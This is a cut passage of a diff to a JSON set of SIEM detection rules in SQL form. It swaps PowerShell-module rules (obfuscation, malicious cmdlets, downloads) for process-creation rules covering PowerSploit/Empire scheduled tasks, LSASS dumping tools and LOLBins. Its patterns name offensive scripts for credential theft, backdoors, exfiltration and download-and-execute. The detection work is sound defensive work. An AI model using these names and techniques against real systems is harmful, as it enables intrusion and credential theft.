OR Payload LIKE 
'%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite 
the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use via a batch script or by an administrator." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", 
+ "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. 
This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs 
WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND 
CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE 
'\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. 
This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom 
assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1027", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + 
"level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR 
